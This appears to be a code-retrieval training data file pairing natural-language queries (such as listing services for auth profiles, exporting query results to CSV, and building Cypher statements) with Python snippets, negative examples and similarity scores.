"def __init__(self, username):\n\t\tself.client = None\n\t\tself.credentials = GoogleAnalyticsUserModel.query.filter_by(username = username).first()\n\t\tprint self.credentials\n\t\tif self.credentials:\n\t\t\tprint 'there are ga credentials' \n\t\t\texpires_on = self.credentials.token_expiry\n\t\t\tprint 'expires on' + str(expires_on)\n\t\t\tcurrent_time = datetime.now()\n\t\t\tprint 'current_time '+str(current_time)\n\t\t\tcredentials_dict = self.credentials.as_dict()\n\t\t\tself.credentials_dict = credentials_dict\n\t\t\tprint 'about to compare times'\n\t\t\tif current_time > expires_on:\n\t\t\t print 'credentials dict:'\n\t\t\t print self.credentials_dict\n\t\t\t print 'about to refresh token'\n\t\t\t self.refresh_token(credentials_dict.get(\"refresh_token\"), credentials_dict.get(\"client_id\"), credentials_dict.get(\"client_secret\"))\n\t\t\t print 'GA credentials: ' + str(self.credentials_dict)\n\t\t\t#else: \n\t\t\t# self.refresh_token(credentials_dict.get(\"refresh_token\"), credentials_dict.get(\"client_id\"), credentials_dict.get(\"client_secret\"))\n\n\t\t\tself.client = self.build_client()\n\t\telse:\n\t\t\tprint \"no GA credentials\"\n\t\t\treturn None"
] |
[
"0.72963715",
"0.71768534",
"0.7008515",
"0.6679525",
"0.66671413",
"0.6565561",
"0.6542577",
"0.6542577",
"0.65328103",
"0.65221035",
"0.64870876",
"0.64740664",
"0.63877106",
"0.6376841",
"0.6366579",
"0.62008286",
"0.6167424",
"0.61051875",
"0.6090958",
"0.5974501",
"0.5879415",
"0.5841206",
"0.58210343",
"0.5820534",
"0.57087713",
"0.56369275",
"0.5570848",
"0.5539658",
"0.54318154",
"0.5402221"
] |
0.79859585
|
0
|
Return list of services for all auth profiles
|
def get_services(self):
services = []
for p in self.config['auth_profiles']:
services.append(self.get_service(p))
return services
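# The loop above can also be written as a list comprehension with the same
# behaviour; this is only a sketch assuming the surrounding class and the
# config layout used by get_service().
def get_services(self):
    return [self.get_service(p) for p in self.config['auth_profiles']]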
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_services(profile=None, api_key=None):\n return salt.utils.pagerduty.list_items(\n \"services\", \"name\", __salt__[\"config.option\"](profile), api_key, opts=__opts__\n )",
"def list_services(ctx):\n pass",
"def get_services(self): \n if self._access_token is None:\n raise RequiresAccessTokenError()\n\n response = self.__make_oauth_request(ADD_URLS_FOR_SERVICES_URL, token=self._access_token, signed=True)\n return simplejson.loads(response.read()).keys()",
"def get_services(self):\r\n return get_service_list()",
"async def api_get_services(g: WalletTypeInfo = Depends(get_key_type)):\n user = await get_user(g.wallet.user)\n wallet_ids = user.wallet_ids if user else []\n services = []\n for wallet_id in wallet_ids:\n new_services = await get_services(wallet_id)\n services += new_services if new_services else []\n return [service.dict() for service in services] if services else []",
"def get(self):\n return UserServices.get_all()",
"def getAllServices(self) -> List[ghidra.framework.plugintool.ServiceInterfaceImplementationPair]:\n ...",
"def get_services(self):\n\n return list(self.services.values())",
"def list_profiles(self, params):\n return self.profiles",
"def services(self):\n return self.agent.http.get(\n lambda x: json.loads(x.body), '/v1/agent/services')",
"def all_services(self):\n services = oc.all_service_names()\n for s in services:\n print(s)\n print(\"#total\", len(services))",
"def list_services(self, **kwargs: Optional[Any]) -> list:\n\n self.logger.debug(\"list_services: %s\", kwargs)\n\n namespace = kwargs.get(\"namespace\", \"global\")\n\n return self.AD.services.list_services(namespace) # retrieve services",
"def get_all_profiles(store=\"local\"):\n return {\n \"Domain Profile\": get_all_settings(profile=\"domain\", store=store),\n \"Private Profile\": get_all_settings(profile=\"private\", store=store),\n \"Public Profile\": get_all_settings(profile=\"public\", store=store),\n }",
"def get_services_list(self, services):\n if not services:\n return []\n\n return [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]",
"def fetch_all(profile):\n params = {}\n params[\"profile\"] = profile\n response = utils.do_request(instanceprofile, \"get\", params)\n data = utils.get_data(\"InstanceProfiles\", response)\n return data",
"def get_services(self):\n services = []\n for f in dir(self):\n o = getattr(self, f)\n if callable(o) and hasattr(o, '_service_name'):\n services.append(getattr(o, '_service_name'))\n return services",
"def getServices(self):\n pass",
"def available_services():\n all_datas = ()\n data = ()\n\n for class_path in settings.TH_SERVICES:\n class_name = class_path.rsplit('.', 1)[1]\n # 2nd array position contains the name of the service\n data = (class_name, class_name.rsplit('Service', 1)[1])\n all_datas = (data,) + all_datas\n return all_datas",
"def available_services(self) -> list[str]:\r\n return self.services",
"def services(request):\n\n services = Service.objects.all()\n creator_profile = UserProfile.objects.all()\n\n template = 'services/services.html'\n context = {\n 'services': services,\n 'creator_profile': creator_profile,\n }\n\n return render(request, template, context)",
"def selectable_services():\n\n db = current.db\n s3db = current.s3db\n\n stable = s3db.org_service\n query = (stable.deleted == False)\n rows = db(query).select(stable.id,\n stable.name,\n )\n services = {row.id: row.name for row in rows}\n return services",
"def get_profiles(self):\n profiles = [['Profile name', 'GUID']]\n r = self.system_cursor.execute('{Call wtGetProfileList()}')\n for row in r.fetchall():\n profiles.append([row.PROFILE_NAME, row.PROFILE_GUID])\n return profiles",
"def getServices(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n path = '{}/catalog'.format('/'.join(plone.api.portal.get().getPhysicalPath()))\n query = dict(portal_type='Service', sort_on='sortable_title', path=path)\n result = list()\n for brain in catalog(**query):\n result.append((brain.getId, brain.Title))\n return result",
"def get_all_profiles(self) -> List[Profile]:\n return [self.model.parse_obj(profile) for profile in self.read_records(SyncMode.full_refresh)]",
"def list(conn):\n try:\n return conn.get(url='/auth-providers')['providers']\n except SystemError as e:\n raise e",
"def profiles(self):\n if not self._profiles:\n self.GetAllProfiles()\n return self._profiles",
"def get_services(self):\n ret = self.v1_service_list.get()\n services = {each.metadata.namespace: each.metadata.name for each in ret.items}\n\n return services",
"def service_accounts(self) -> Sequence[str]:\n return pulumi.get(self, \"service_accounts\")",
"def retrieve_services(account):\n uri = \"https://api.pagerduty.com/services\"\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Token token=' + account.api_access_key,\n 'Accept': 'application/vnd.pagerduty+json;version=2'\n }\n json_root = 'services'\n timeout_seconds = 10\n params = {'include[]': 'integrations', 'sort_by': 'name:desc'}\n all_services = _invoke_pagerduty_resource_api(uri, headers, json_root, params, timeout_seconds)\n\n services = []\n for svcDict in all_services:\n if (_valid_service(svcDict)):\n integration = _get_zenoss_integration(svcDict)\n if integration == False:\n continue\n\n service = Service(name=svcDict['name'],\n id=svcDict['id'],\n type=svcDict['type'],\n service_key=integration['integration_key'])\n services.append(service)\n\n return services",
"def list_state_services(self, auth, context=None):\n return self._client.call_method(\n 'UserAndJobState.list_state_services',\n [auth], self._service_ver, context)"
] |
[
"0.73958594",
"0.6973076",
"0.67835885",
"0.6751856",
"0.6588541",
"0.655133",
"0.6544352",
"0.65439755",
"0.6432942",
"0.6429285",
"0.6399615",
"0.63925225",
"0.63810605",
"0.6370326",
"0.6329185",
"0.628808",
"0.62779367",
"0.62436295",
"0.6207708",
"0.61990726",
"0.619445",
"0.61748713",
"0.6172009",
"0.6143339",
"0.61232847",
"0.6122378",
"0.60490793",
"0.602947",
"0.6023793",
"0.60198194"
] |
0.86264575
|
0
|
Remove any columns specified. The default columns for any query are the id of the token and the label of the type.
|
def clear_columns(self):
self._columns = []
return self
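# Returning self allows calls to be chained while composing a query. The toy
# class below only illustrates that chaining pattern; its names are
# hypothetical and not the original library's API.
class ToyQuery:
    def __init__(self):
        self._columns = []

    def clear_columns(self):
        self._columns = []
        return self

    def column(self, name):
        self._columns.append(name)
        return self

q = ToyQuery().clear_columns().column('token_id').column('type_label')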
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _delete_null_columns(self):\r\n ds = DeleteStatement(self.column_family_name)\r\n deleted_fields = False\r\n for _, v in self.instance._values.items():\r\n col = v.column\r\n if v.deleted:\r\n ds.add_field(col.db_field_name)\r\n deleted_fields = True\r\n elif isinstance(col, Map):\r\n uc = MapDeleteClause(col.db_field_name, v.value, v.previous_value)\r\n if uc.get_context_size() > 0:\r\n ds.add_field(uc)\r\n deleted_fields = True\r\n\r\n if deleted_fields:\r\n for name, col in self.model._primary_keys.items():\r\n ds.add_where_clause(WhereClause(\r\n col.db_field_name,\r\n EqualsOperator(),\r\n col.to_database(getattr(self.instance, name))\r\n ))\r\n self._execute(ds)",
"def test_remove_columns(self):\n table = Table('table1', key=['col1', 'col2'])[\n Column('col1'),\n Column('col2'),\n Column('col3'),\n Column('col4'),\n ]\n\n table.remove_columns(('col2', 'col3'))\n\n self.assertEqual(2, len(table.columns))\n self.assertEqual('col1', table.columns[0].name)\n self.assertEqual('col4', table.columns[1].name)\n self.assertEqual([], table.key)",
"def _delcolumns(self, columnname, columndata=\"\"):\n\n del self[columnname]",
"def drop_unnecessary_columns(df):\n df = df.drop([\n 'id',\n 'imdb_id',\n 'poster_path',\n 'video',\n 'status',\n 'weighted_rating', # Only average_rating was used for this project\n 'original_title',\n 'crew', # Used in production_score\n 'producers', # Used in production_score\n 'executive_producers', # Used in production_score\n 'cast', # Used in production_score\n 'director', # Used in production_score\n 'production_companies', # Used in production_score\n 'production_countries', # Binarized\n 'genres', # Binarized\n 'original_language', # Binarized\n 'adult', # No adult movies in the dataset, so no variance between movies\n 'release_date', # Not being considered for this project\n 'overview',\n 'title',\n 'tagline',\n 'vote_average', # Ratings have been binned\n 'popularity', # Only considering average_rating\n 'vote_count', # We are making a predictor, so it makes no sense to use vote counts as input\n 'revenue', # We are making a predictor, so it makes no sense to use revenue as input\n 'keywords', # Not considering keywords for this project\n 'revenue_divide_budget', # We are making a predictor, so it makes no sense to use revenue/budget as input\n ], 1)\n return df",
"def drop_cols(df, cols=['EMP_S', 'FIRMPDEMP_S', 'GEO_ID', 'GEO_TTL', 'MSA',\n 'PAYANN_S', 'RCPPDEMP_S', 'ST', 'YEAR', 'YIBSZFI',\n 'YIBSZFI_TTL', 'us', 'Unnamed: 0']):\n df = df.drop(columns=cols)\n return df",
"def _drop_columns_step(self, op: data_algebra.data_ops_types.OperatorPlatform, *, data_map: Dict[str, Any]):\n res = self._compose_polars_ops(op.sources[0], data_map=data_map)\n res = res.select(op.columns_produced())\n return res",
"def get_cols_drop():",
"def remove_urequired_columns(self, unrequired_columns):\n self.df = self.df.drop(columns=unrequired_columns)",
"def drop(self, columns: List[str]):\n self._check_columns(columns)\n return self._fromdata(\n {\n self.dtype.fields[i].name: ColumnFromVelox.from_velox(\n self.device,\n self.dtype.fields[i].dtype,\n self._data.child_at(i),\n True,\n )\n for i in range(self._data.children_size())\n if self.dtype.fields[i].name not in columns\n },\n self._mask,\n )",
"def _remove_redundant_columns(self):\n self.dataframe.drop(['letter', 'sentiment'], axis=1, inplace=True)",
"def clear(self):\n cols = list(self.info.columns.keys())\n for col_name in cols:\n if col_name == DEFAULT_COLUMN_NAME:\n continue\n self.clear_column(col_name)\n\n self.info.clear_files()",
"def drop_columns(self, columns):\n dframe = self.dframe(keep_parent_ids=True)\n self.replace_observations(dframe.drop(columns, axis=1))",
"def _drop_fields(usecols, dtype, dropcols):\n for col in dropcols:\n try:\n usecols.remove(col)\n except ValueError:\n pass\n try:\n del dtype[col]\n except KeyError:\n pass\n return usecols, dtype",
"def remove_data():\n # Removing the existing data\n col_answer_given.remove()\n col_answer_not_given.remove()\n col_q_not_given.remove()\n col_to_summarize.remove()",
"def drop_columns(self, col):\n try:\n self.cleaned_data.drop(col, axis=1, inplace=True)\n except Exception as e:\n raise e",
"def delete_columns(self, columns):\n columns = to_list(columns)\n\n unknown = set(columns) - set(self._columns)\n if unknown:\n names = \", \".join(str(name) for name in unknown)\n raise ValueError(f\"Unable to remove unknown columns: {names}\")\n\n for column in columns:\n col = self.column_location(column)\n for idx in self.index:\n del self._data[idx][col]\n del self._columns[col]",
"def drop_extra_columns(self):\n table = self.data.loc[:, self._required_columns]\n return self.as_dataframe(table)",
"def remove_columns(df):\n avg = np.mean(df[df['sentiment'] != 'None']['sentiment'].astype('float'))\n df['sentiment'] = df['sentiment'].replace('None', avg).astype('float')\n\n to_remove = []\n print('column(s) removed: ')\n for column in df.columns:\n print(column)\n if(np.unique(df[column][df[column].notnull()]).shape[0] < 2):\n print(column)\n to_remove.append(column)\n \n return df.drop(columns = to_remove)",
"def remove_insertion_columns(self):\n cols = self.get_insertion_columns()\n s = []\n a = 0\n for b in cols:\n if b > a:\n s.append((a, b))\n a = b + 1\n s.append((a, len(self.col_labels)))\n for name, seq in list(self.items()):\n news = []\n for c in s:\n news.append(seq[c[0]:c[1]])\n self[name] = \"\".join(news)",
"def _drop_cols(self, duplicate_cols):\n self._hybrid_meta.drop(\n duplicate_cols + DROPPED_COLUMNS,\n axis=1, inplace=True, errors='ignore'\n )",
"def drop_id_columns(df):\n id_cols = get_id_columns(df)\n if len(id_cols) > 0:\n df = df.drop(id_cols, axis = 1)\n\n return df",
"def clear(self):\n for col in self.cols:\n self.data[col] = []\n return self",
"def preprocess(df):\n drop_cols = ['duration_ms', 'key', 'mode', 'time_signature', 'popularity', 'tempo']\n drop_cols += ['track_id', 'track_name', 'artist_name']\n for col in drop_cols:\n if col in list(df.columns):\n df = df.drop(columns=col)\n return df",
"def drop_cols(df, cols):\n df.drop(cols, axis=1, inplace=True)\n\n return df",
"def remove_columns(tx, header, columns_to_remove):\n print(\"\\nRemove columns...\")\n num_removed = 0\n for col in columns_to_remove:\n tx = np.delete(tx, col - num_removed, 1)\n header = np.delete(header, col - num_removed + 2)\n num_removed += 1\n print(\"\\n... finished.\")\n return tx, header",
"def remove_intermediate_columns(dataframe):\n\n combined_dataframe_dropped_cols = dataframe.drop(columns = ['measureland_qualifier_flag_speed',\n 'measureland_qualifier_flag_distance',\n 'measureland_qualifier_flag_acceleration',\n 'measureland_qualifier_flag_visual'])\n\n print(\"Dimensions of combined dataframe after dropping columns:\", combined_dataframe_dropped_cols.shape)\n print(\"Combined dataframe after dropping columns: \", combined_dataframe_dropped_cols.sample(10))\n\n return combined_dataframe_dropped_cols",
"def reset_columns(self):\n\n reset_cols = [i for i in self.__cols if i in self.__df_timings.columns]\n self.__df_timings = self.__df_timings.loc[:, reset_cols]\n return",
"def remove_columns(data, col_ids):\n return np.delete(data, col_ids, axis=1)",
"def remove_all_fields(self):\n self.fields = None",
"def delete_variable(self, columns):\n if not isinstance(columns, (list, tuple)):\n columns = [columns]\n for col in columns:\n if isinstance(col, str):\n col = [i for i, v in enumerate(self.list) if v.name == col][0]\n self.list.pop(col)"
] |
[
"0.6175713",
"0.6078552",
"0.6025119",
"0.60184366",
"0.60068727",
"0.59229934",
"0.5912904",
"0.5882896",
"0.58668727",
"0.58612",
"0.5853696",
"0.5852278",
"0.5851712",
"0.5823952",
"0.5740287",
"0.5717554",
"0.57098347",
"0.5708513",
"0.56833816",
"0.56809497",
"0.563553",
"0.5586917",
"0.55833614",
"0.55783653",
"0.55710983",
"0.5525263",
"0.55234903",
"0.5517471",
"0.5489227",
"0.54554176"
] |
0.65311384
|
0
|
Same as ``all``, but the results of the query are output to the specified path as a CSV file.
|
def to_csv(self, path):
results = self.all()
if self.stop_check is not None and self.stop_check():
return
results.to_csv(path)
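# A minimal sketch of the same idea with pandas (an assumed dependency, since
# results.to_csv() above suggests a DataFrame-like object): run the query,
# honour an optional cancellation hook, then write the results to CSV.
import pandas as pd

def results_to_csv(results: pd.DataFrame, path: str, stop_check=None) -> None:
    if stop_check is not None and stop_check():
        return  # the caller requested cancellation before the write
    results.to_csv(path, index=False)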
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_csv(self, path):\n for table in ['datasets', 'dataruns', 'hyperpartitions', 'classifiers']:\n df = pd.read_sql('SELECT * FROM %s' % table, self.session.bind)\n df.to_csv(os.path.join(path, '%s.csv' % table), index=False)",
"def log_results(self, path):\n pd.DataFrame(self.results).to_csv(path)",
"def set_query_output(self, path):\n\n file = f'sql_query_R{str(self.time_span).replace(\".\", \"_\")} ({str(self.date_time).replace(\":\",\"_\")}).csv'\n self.query_output_file = path_inc(path, file)",
"def write_csv(self, directory = None):\n if ((directory is None) and\n (self._session.config.folder_basename is not None)):\n directory = self._session.results._full_path\n else:\n return\n \n file = CSV_file(self, directory)\n file.write()\n return file",
"def to_csv(self, dir_path, **kwargs):\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n for name, table in self.items():\n path = os.path.join(dir_path, '%s.csv' % name)\n\n table.to_csv(path, **kwargs)",
"def create_query_csv(self):\n\n self.query_df.to_csv(self.query_output_file)",
"def to_csv(self, path: pathlib.Path):\n combined = self.combined_df\n assert combined[CommonFields.LOCATION_ID].notna().all()\n common_df.write_csv(\n combined, path, structlog.get_logger(), [CommonFields.LOCATION_ID, CommonFields.DATE]\n )\n if self.provenance is not None:\n provenance_path = str(path).replace(\".csv\", \"-provenance.csv\")\n self.provenance.sort_index().to_csv(provenance_path)",
"def to_csv_files(self, path):\n self._to_dict_tree().to_csv_files(path)",
"def export_csv(self, outpath):\n\n\t\tself.df.to_csv(outpath)",
"def csv(self, destination_path):\n # todo - test for single and duplicate base cases\n to_csv(self._axl_data, destination_path)",
"def save_results(self, path):\n create_folder(path)\n self.get_scores().to_csv(path + r'/scores.csv', index=False)\n self.get_results().to_csv(path + r'/results.csv', index=False)\n self.get_pivot_last_epoch().to_csv(path + r'/pivot_last_epoch.csv', index=True)",
"def printCsv(self):\n self.printCsvHeader()\n for r in self._records:\n r.printCsv()",
"def export_results(path: str):\n _, ext = Utils.get_filename_ext(path)\n\n if ext not in [\".md\", \".json\", \".csv\"]:\n click.echo(\"Output file must be of type markdown, csv or json.\\n\", err=True)\n return\n\n with open(path, \"w+\") as out:\n Exporter.write(Format(Utils.format_to_int(ext)), out)\n\n click.echo(f\"Successfully exported results to {path}\\n\")",
"def save_dataset_csv(self, path):\n cols = list(self.data_dict.keys())\n df = pd.DataFrame(self.data_dict, index=None, columns=cols)\n df.to_csv(path, index=True)",
"def to_csv(self, out_folder):\n import pandas as pd\n\n df = pd.DataFrame(zip(self.results['cids'],\n self.results['differences'],\n self.results['experimental_values']),\n columns=['cids', 'differences',\n 'experimental_values'])\n df.to_csv(out_folder, index=False)",
"def export_table(path, path_out):\n table = rb.get_table(path)\n table.to_csv(path_out, index=False)\n return",
"def file(self):\n result = []\n completePath = CompletePath(self.path, self.filename) \n with open(completePath.path(), 'w', newline='') as csvfile:\n fieldnames = ['Activity', 'Points']\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n writer.writeheader()\n for i in range ( len( self.groupPriority.rows() ) ):\n tmp = self.groupPriority.rows()[i]\n self.log.info ( \"FinalCSV\", \"file\",\"data {0},{1}\".format( tmp.activity(), tmp.points() ) )\n writer.writerow({'Activity': tmp.activity(), 'Points': tmp.points()})\n self.log.info(\"FinalCSV\", \"file\", \"Elaborated file: {0}\".format ( completePath.path() ) )",
"def get_csv(self):\n all_csvs = [each for each in listdir(self.cur_dir) if each.endswith('.csv')]\n return all_csvs",
"def export_csv(self, path):\r\n\r\n with open(path, 'w') as f:\r\n f.write('# h,hr,m')\r\n\r\n if self.rho is not None:\r\n f.write(',rho')\r\n if self.temperature is not None:\r\n f.write(',temperature')\r\n\r\n f.write('\\n')\r\n for i in range(self.shape[0]):\r\n for j in range(self.shape[1]):\r\n f.write(f'{self.h[i, j]},{self.hr[i, j]},{self.m[i, j]}')\r\n if self.rho is not None:\r\n f.write(f',{self.rho[i, j]}')\r\n if self.temperature is not None:\r\n f.write(f',{self.temperature[i, j]}')\r\n f.write('\\n')\r\n return",
"def to_csv(self, path, sep=';', **kwargs):\n df = self.get_as_pandas_dataframe()\n df.to_csv(path, sep=sep, index=False, **kwargs)",
"def write_results(results):\n with RESULTS_PATH.open(\"w\") as writer:\n csvwriter = csv.writer(writer)\n csvwriter.writerows(results)",
"def to_csv(self, path):\n if os.path.isdir(path):\n shutil.rmtree(os.path.join(path))\n os.makedirs(path)\n\n for name, df in self.input_data.items():\n name += \".csv\"\n filename = os.path.join(path, name)\n df.to_csv(filename)\n logging.info(\"Scenario saved as csv-collection to %s\", path)",
"def generate_report(self, output_path):\n with open(output_path, 'w', newline='', encoding=\"utf-8\") as csv_fd:\n writer = csv.writer(csv_fd, quoting=csv.QUOTE_NONNUMERIC, doublequote=False, escapechar=\"\\\\\")\n writer.writerow([\"category\", \"level\", \"description\", \"method\", \"parameter\", \"url\", \"body\"])\n writer.writerows(self._vulns)\n writer.writerows(self._anomalies)\n writer.writerows(self._additionals)",
"def output_into_file(self, path: str):\n # Creating path if not exist\n Path(path).mkdir(parents=True, exist_ok=True)\n # Writing every day as a csv file\n for day in self:\n with open(f\"{path}/{day.name}.csv\", \"w\") as file:\n writer = csv.writer(file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n # First line / Title\n writer.writerow([\" \", day.name])\n for shift in day:\n employees = \", \".join([e.name for e in shift.employees])\n writer.writerow([f\"{shift.start}-{shift.end}\", employees])",
"def save_to_csv(self):\n path = partial(os.path.join, 'datasets')\n save_name = self.name.lower().replace(' ', '_')\n self.df['values'].sum(axis=1).to_csv(path('{0}_values.csv'.format(save_name)))\n self.df['allocations'].to_csv(path('{0}_allocations.csv'.format(save_name)))\n self.df['returns'].to_csv(path('{0}_returns.csv'.format(save_name)))\n self.trades.to_csv(path('{0}_trades.csv'.format(save_name)))",
"def _csv_export(self, exppath):\n with open(exppath, 'w') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',', skipinitialspace=True)\n csvwriter.writerow(['hexstr','dmc','name'])\n for clr in self.lookup_table:\n csvwriter.writerow([clr.hex.to_str(), clr.id, clr.name])",
"def queryset_to_csv(self):\n csv_data = []\n custom_fields = []\n\n # Start with the column headers\n headers = self.queryset.model.csv_headers.copy()\n\n # Add custom field headers, if any\n if hasattr(self.queryset.model, 'get_custom_fields'):\n for custom_field in self.queryset.model().get_custom_fields():\n headers.append(custom_field.name)\n custom_fields.append(custom_field.name)\n\n csv_data.append(','.join(headers))\n\n # Iterate through the queryset appending each object\n for obj in self.queryset:\n data = obj.to_csv()\n\n for custom_field in custom_fields:\n data += (obj.cf.get(custom_field, ''),)\n\n csv_data.append(csv_format(data))\n\n return '\\n'.join(csv_data)",
"def export(self, queryset=None):\n self.queryset = queryset or self.queryset\n exported_datetime = get_utcnow()\n filename = self.get_filename(exported_datetime)\n path = os.path.join(self.export_folder, filename)\n with open(path, 'w') as f:\n csv_writer = csv.DictWriter(\n f, fieldnames=self.field_names, delimiter=self.delimiter)\n csv_writer.writeheader()\n for model_obj in self.queryset:\n object_helper = self.object_history_helper_cls(\n model_obj=model_obj, create=True)\n objects = object_helper.get_not_exported()\n for obj in objects:\n row = self.prepare_row(\n model_obj=model_obj,\n exported_datetime=exported_datetime,\n export_change_type=obj.export_change_type)\n csv_writer.writerow(row)\n object_helper.update_as_exported(\n objects=objects, exported_datetime=exported_datetime)\n file_history_updater = self.file_history_updater_cls(\n path=path,\n delimiter=self.delimiter,\n model=self.model_cls._meta.label_lower,\n filename=filename)\n file_history_updater.update()\n return path",
"def get_csv_in_path(self, path):\n files = os.listdir((path))\n return files",
"def get_all_files_to_instrument():\n sql=\"SELECT * FROM files\"\n conn=sqlite3.connect(CONNECTION_STRING)\n c=conn.cursor()\n c.execute(sql)\n results=c.fetchall()\n conn.close()\n return results"
] |
[
"0.72415906",
"0.714864",
"0.68289703",
"0.63184816",
"0.63152087",
"0.6263419",
"0.6259996",
"0.60712045",
"0.60492957",
"0.6011469",
"0.59969336",
"0.58934367",
"0.5839492",
"0.5837897",
"0.58354586",
"0.5821142",
"0.580053",
"0.578438",
"0.5771946",
"0.5771284",
"0.57213783",
"0.567657",
"0.5647735",
"0.55912113",
"0.5572885",
"0.5570379",
"0.5555601",
"0.55513686",
"0.5538678",
"0.5487247"
] |
0.7828584
|
0
|
Generates a Cypher statement based on the query.
|
def cypher(self):
kwargs = {'match': '',
'optional_match': '',
'where': '',
'with': '',
'return': ''}
# generate initial match strings
match_strings = set()
withs = set()
nodes = self.required_nodes()
for node in nodes:
if node.has_subquery:
continue
match_strings.add(node.for_match())
withs.update(node.withs)
kwargs['match'] = 'MATCH ' + ',\n'.join(match_strings)
# generate main filters
properties = []
for c in self._criterion:
if c.in_subquery:
continue
properties.append(c.for_cypher())
if properties:
kwargs['where'] += 'WHERE ' + '\nAND '.join(properties)
optional_nodes = self.optional_nodes()
optional_match_strings = []
for node in optional_nodes:
if node.has_subquery:
continue
optional_match_strings.append(node.for_match())
withs.update(node.withs)
if optional_match_strings:
s = ''
for i, o in enumerate(optional_match_strings):
s += 'OPTIONAL MATCH ' + o + '\n'
kwargs['optional_match'] = s
# generate subqueries
with_statements = ['WITH ' + ', '.join(withs)]
for node in nodes:
if not node.has_subquery:
continue
statement = node.subquery(withs, self._criterion)
with_statements.append(statement)
withs.update(node.withs)
for node in optional_nodes:
if not node.has_subquery:
continue
statement = node.subquery(withs, self._criterion, optional=True)
with_statements.append(statement)
withs.update(node.withs)
kwargs['with'] = '\n'.join(with_statements)
kwargs['return'] = self.generate_return()
cypher = self.query_template.format(**kwargs)
return cypher
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _build_statement(self, query, query_key, beets_key):\n statement = \"\"\n if query_key in query:\n for query_string in query[query_key]:\n if '\"' in query_string:\n statement += \" and %s = \\'%s\\' \" % (beets_key,\n query_string)\n else:\n statement += ' and %s = \\\"%s\\\" ' % (beets_key,\n query_string)\n return statement",
"def gen_q_stmt(name, query):\n return \"query {} `{}`;\\n\".format(name, query)",
"def cypher(self, query):\n from neomodel import db\n try:\n results, meta = db.cypher_query(query)\n except Exception as e:\n raise Exception(\n \"Failed to execute Cypher Query: %s\\n%s\" % (query, str(e)))\n return False\n # log.debug(\"Graph query.\\nResults: %s\\nMeta: %s\" % (results, meta))\n return results",
"def Generate(self):\n clauses = [self.main_clause] + self.use_clauses + self.join_clauses\n if self.where_conds:\n if self.or_where_conds:\n clauses.append('WHERE ' + '\\n OR '.join(self.where_conds))\n else:\n clauses.append('WHERE ' + '\\n AND '.join(self.where_conds))\n if self.group_by_terms:\n clauses.append('GROUP BY ' + ', '.join(self.group_by_terms))\n if self.having_conds:\n assert self.group_by_terms\n clauses.append('HAVING %s' % ','.join(self.having_conds))\n if self.order_by_terms:\n clauses.append('ORDER BY ' + ', '.join(self.order_by_terms))\n\n if self.limit and self.offset:\n clauses.append('LIMIT %d OFFSET %d' % (self.limit, self.offset))\n elif self.limit:\n clauses.append('LIMIT %d' % self.limit)\n elif self.offset:\n clauses.append('LIMIT %d OFFSET %d' % (sys.maxint, self.offset))\n\n if self.insert_args:\n clauses.append('VALUES (' + PlaceHolders(self.insert_args[0]) + ')')\n args = self.insert_args\n if self.duplicate_update_cols:\n clauses.append('ON DUPLICATE KEY UPDATE %s' % (\n ', '.join(['%s=VALUES(%s)' % (col, col)\n for col in self.duplicate_update_cols])))\n assert not (self.join_args + self.update_args + self.where_args +\n self.group_by_args + self.order_by_args + self.having_args)\n else:\n args = (self.join_args + self.update_args + self.where_args +\n self.group_by_args + self.having_args + self.order_by_args)\n assert not (self.insert_args + self.duplicate_update_cols)\n\n args = _BoolsToInts(args)\n stmt_str = '\\n'.join(clause for clause in clauses if clause)\n\n assert _IsValidStatement(stmt_str), stmt_str\n return stmt_str, args",
"def run_cypher_query(self, query):\n with self._driver.session() as session:\n session.write_transaction(self.add_input_graph, query)",
"def generate_query(self):\n return",
"def print_query(query: Query) -> str:\n regex = re.compile(r\":(?P<name>\\w+)\")\n params = query.statement.compile().params\n sql = regex.sub(r\"'{\\g<name>}'\", str(query.statement)).format(**params)\n from flexmeasures.data.config import db\n\n print(f\"\\nPrinting SQLAlchemy query to database {db.engine.url.database}:\\n\\n\")\n print(sql)\n return sql",
"def cypher(self, query: str, **parameters: str) -> Any:\n\n try:\n # results, meta = db.cypher_query(query, parameters)\n results, _ = db.cypher_query(query, parameters)\n except CypherSyntaxError as e:\n log.warning(query)\n log.error(f\"Failed to execute Cypher Query\\n{e}\")\n raise CypherSyntaxError(\"Failed to execute Cypher Query\") from e\n return results",
"def gen_sql(runtime, query_type, target_model=None):\n\n from_table = runtime.model.table_name\n\n # if target_model not given, use from_table instead\n if target_model is None:\n target_model = runtime.model\n\n target_table = target_model.table_name\n\n data = runtime.data # alias\n\n # quick mark for parse time functions\n _where = Compiler.parse_where(data['where'])\n _set = Compiler.parse_set(data['set'])\n _orderby = Compiler.parse_orderby(data['orderby'])\n _select = Compiler.parse_select(data['select'])\n _limit = Compiler.parse_limit(data['limit'])\n _groupby = Compiler.parse_groupby(data['groupby'])\n _having = Compiler.parse_having(data['having'])\n _distinct = Compiler.parse_distinct(data['distinct'])\n\n pattern = Compiler.SQL_PATTERNS[query_type]\n\n SQL = pattern.format(**{\n 'target': target_table,\n 'set': _set,\n 'from': from_table,\n 'where': _where,\n 'select': _select,\n 'limit': _limit,\n 'orderby': _orderby,\n 'groupby': _groupby,\n 'having': _having,\n 'distinct': _distinct,\n })\n\n return SQL",
"def generate_query(schema):\n q = None\n if schema:\n q = \"CREATE SCHEMA\"\n if schema.if_not_exists:\n q = \"{} IF NOT EXISTS\".format(q)\n if schema.name:\n q = \"{} {}\".format(q, schema.name)\n if schema.authorization:\n q = \"{} AUTHORIZATION {}\".format(q, schema.authorization)\n return q",
